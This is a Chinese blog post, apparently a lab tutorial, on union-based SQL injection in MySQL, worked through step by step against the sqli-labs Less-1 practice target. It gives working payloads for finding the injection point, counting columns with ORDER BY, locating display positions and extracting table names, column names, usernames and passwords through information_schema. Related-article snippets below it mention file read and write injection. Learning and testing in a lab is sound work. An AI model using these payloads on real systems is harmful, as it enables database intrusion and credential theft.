WEB攻防-通用漏洞-SQL注入-MYSQL-union一般注入

最新推荐文章于 2024-07-23 17:15:19 发布
最新推荐文章于 2024-07-23 17:15:19 发布
阅读量882 收藏 20
点赞数 29
分类专栏: SQL注入 网络安全 文章标签: mysql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45534587/article/details/140604718
版权

前置知识

  1. MySQL5.0以后存放一个默认数据库information_schema
  2. schemata表存放该用户创建的所有库名,schemata. schema_name字段存放库名
  3. tables表存放该用户创建的所有库名和表明,tables.table_schema字段存放库名,tables.table_name存放表名
  4. columns表存放该用户创建的所有库名、表名和字段名,columns.table_schema存放库名,columns.table_name存放表名,columns.column_name存放字段名
  5. database():当前使用的数据库
  6. version():当前MySQL的版本
  7. @@version_compile_os:当前操作系统
  8. user():当前MySQL的用户

  9. group_concat() 罗列出当前参数的所有数据

靶场平台:

sqli-labs的less1

Union一般注入

判断注入点


127.0.0.1/sql/Less-1/?id=1'输入?id=1’后报错,根据报错信息 ''1'' LIMIT 0,1',单引号包含到就是报错位置'1'' LIMIT 0,1,其中1'是我们传入的,可以看到有一个单引号包裹着,由此推断出该sql语句由单引号的闭合模式

127.0.0.1/sql/Less-1/?id=1' and 1=1%23,(%23代表#),其中and 1=1为真,所以返回结果相同。因为是单引号的闭合模式,所以应该在1后面输入一个单引号将其闭合,否则将把后面的都当作整体,由于我们人为地闭合和引号,语句就变成‘1‘ and 1=1‘ LIMIT 0,1,会报错,

所以需要把后面的注释掉,#在地址栏不自动转换编码,所以手动转换%23,‘1‘ and 1=1#‘ LIMIT 0,1

127.0.0.1/sql/Less-1/?id=1' and 1=2%23,由于and 1=2为假,根据条件判断sql执行后是null的,所以返回未查到数据

order by猜字段数

通过order by n猜当前查询有几个字段,n取返回正常页面的最大值,原理是n代表使用第几列用于排序,假设只有3个字段,n取4就会报错 1054 - Unknown column '4' in 'order clause',因为没有第四个字段

127.0.0.1/sql/Less-1/?id=1' order by 3%23返回正常

127.0.0.1/sql/Less-1/?id=1' order by 4%23返回异常

故n为3,当前查询有3个字段

union联合查询获取显示位

127.0.0.1/sql/Less-1/?id=1' union select 1,2,3%23,order by中n是多少就需要填充几个数字(值)作为占位符,但发现没有得到期望结果

由于mysql前表查询的内容总在前面,后表查询的内容在后面,并且limit 0,1只返回一条结果,所以union获取的结果没有输出

补充:在access数据库中,后面union查询始终在第一行。

把参数修改为数据库中没有的数据,如-999,让前表无法查询到,从而返回后表的内容

 故只要使得前表查询失败即可,127.0.0.1/sql/Less-1/?id=-1' union select 1,2,3%23,从而得到显示位为2和3,这时就可以通过显示位去注入一些sql语句或函数来达到目的

注入利用

根据前置知识获取数据库的信息和数据

127.0.0.1/sql/Less-1/?id=-1' union select 1,version(),database()%23,尝试获取数据库名和数据库版本

group_concat() 将当前获取的所有数据拼接输出

查数据库security下的表名:127.0.0.1/sql/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= 'security'%23

查users表的字段名:127.0.0.1/sql/Less-1/?id=-1' union select 1, 2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'# 

查询username和password:127.0.0.1/sql/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from security.users %23

癞皮狗不赖皮
关注
  • 29
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
T-SQL篇如何防止SQL注入的解决方法
01-19
1.什么是SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为...
SXU-网络攻防第六次作业-sql注入进阶
12-27
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过构造恶意的SQL语句来操纵数据库,获取敏感信息或控制数据库系统。本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆...
day25WEB攻防-通用漏洞&SQL读写注入&MYSQL&SqlServer&PostgreSQL
m0_69583059的博客
01-15 1072
Access无高权限注入点,只能猜解,还是暴力猜解MYSQL,PostgreSQL,MSSQL高权限注入点可以升级读写执行等,高权限注入可以通过写入后门或者读取相关配置文件获取当前网站的相关权限,不需要通过一步一步猜解数据,当然这只是里理论,在实际环境中,可能会因为数据库的某些设置或者防护导致无法读写注入,如果能绕过当然是最好的,如果不能绕过那么我们只能乖乖的一步一步猜解 读取文件:union select load_file('读取路径'),2,3 写入文件:union select '写入信息',2,
第24天:WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移
wuqingsix的博客
11-17 483
access联合查询及偏移注入,mysql注入
小迪安全25WEB 攻防-通用漏洞&SQL 读写注入&MYSQL&MSSQL&PostgreSQL
weixin_73760178的博客
02-18 1075
id=2 and 1=2 union all select 1,(select username from manage),(select password from manage where username in ('admin_mz')),4 8、MD5解密。——令日志内容写入知指定路径。
WEB攻防-通用漏洞-SQL 读写注入-MYSQL&MSSQL&PostgreSQL
最新发布
weixin_45534587的博客
07-23 557
高权限注入指的是攻击者通过SQL注入漏洞,利用具有高级权限的数据库账户(如MYSQL的root用户、MSSQL的sa用户、PostgreSQL的dba用户)执行恶意SQL语句。这些高级权限账户能够访问和修改数据库中的所有数据,甚至执行操作系统级别的命令。
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
m0_65336233的博客
10-10 660
WEB攻防-通用漏洞&SQL注入-类型&提交方式&盲注
小迪安全24WEB 攻防-通用漏洞&SQL 注入&MYSQL 跨库&ACCESS 偏移
weixin_73760178的博客
01-29 1097
SQL注入:传参id变量,通过$sql变量来进行指定的sql数据库查询,从而执行恶意的SQL语句,实现查询其他数据内容(敏感信息)**原理:**借用数据库的自连接查询(inner join)让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示。实现当前网站跨库查询其他网站——原理:因为是root用户会管理到所有的网站的数据库。数据库中的操作能被其利用和破坏——增删改查——需符合SQL语句的逻辑格式。注:这里的联合查询是有限制的,就是union前后查询的数据必须保持同列。产生在数据库上的注入
day29WEB攻防-通用漏洞&SQL注入&盲注&延时&布尔&报错&增删改查
m0_69583059的博客
01-20 1340
因为时间盲注是运用于没有任何错误信息或者回显的注入情况,所以我们并不能从页面上获取我们发送的语句返回情况,由于发送请求到服务器回显是需要一段时间的,所以我们可以利用回显时间来判断服务器返回情况,其实就是在布尔盲注的基础上加上一个if语句,错误时让页面正常返回,正确时让页面延时返回,由此我们就可以通过返回时间来判断是否注入成功。用Burp爆破字母a的位置,即可得到数据库名每个位置上的字符。盲注就是在注入的过程中,获取的数据不能回显到前端页面,此时,我们要利用一些方法进行判断 或者尝试,这个过程称之为盲注。
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
m0_65336233的博客
10-08 413
WEB攻防-通用漏洞&SQL读写注入&ACCESS偏移注入&MYSQL&MSSQL&PostgreSQL
24、Web攻防——通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移
qq_55202378的博客
12-30 1128
脚本代码在与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),使用预定义的SQL查询语句进行数据查询。能通过参数传递自定义值来实现SQL语句的控制,执行恶意的查询操作,例如查询数据库中的管理员账户密码。2. 像登录注册窗口,虽然URL中没有参数,但是这种登录注册,脚本代码肯定会与数据库进行交互,不然它怎么知道你是真用户还是假用户。不同用户的权限不同,也就是说不同权限的用户能够查询的表不一样。跨库注入:实现当前网站跨库查询其他数据库对应的网站数据。二、测试SQL注入的地方。以上版本:自带数据库。
计算机网络攻防-(共37张PPT).pptx
11-14
计算机网络攻防-(共37张PPT).pptx
SXU-网络攻防作业五-boolean注入
12-27
首先,我们从【标题】和【描述】中了解到这是一项关于网络攻防的作业,其目标是实践并理解布尔型注入,通过一系列的输入测试,以确定是否存在注入漏洞,并尝试获取数据库中的信息,而不直接打开S&L(可能指的是SQL的...
华安解密之DDoS攻防-06HTTP原理篇HTTPGETFlood
01-27
可见,网络江湖异常险恶,攻防之间此消彼长,了解攻击才能更好的防御,这也是华安写作解密系列的初衷。在该事件中,攻击者利用搜狐视频网站的XSS漏洞(CrossSiteScripting,跨站脚本攻击),劫持视频观看者的流量,...
MySQL:SELECT 语句
Zachyy的博客
07-20 398
在 MySQL 中,可以使用 SELECT语句来查询数据。查询数据是指从数据库中根据需求,使用不同的查询方式来获取不同的数据,是使用频率最高、最重要的操作。
测试开发面试题---MySQL
m0_53302824的博客
07-22 944
索引是数据库管理系统中用于提高数据检索速度的数据结构,它可以帮助快速定位数据不需要扫描全表。提高查询速度;唯一性约束,确保数据不会重复;辅助排序和分组;减少磁盘IO。
mysql中ONLY_FULL_GROUP_BY报错
zzzzzucc的博客
07-21 313
禁用会话级别的 ONLY_FULL_GROUP_BY SET SESSION sql_mode = ‘’;– 或者禁用全局级别的 ONLY_FULL_GROUP_BY SET GLOBAL sql_mode = ‘’;在 MySQL 中,sql_mode是一个服务器变量,用于定义 SQL 语句的运行模式。是sql_mode中的一个选项,它影响 SQL 查询中GROUP BY子句的行为。
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 513
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

癞皮狗不赖皮

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值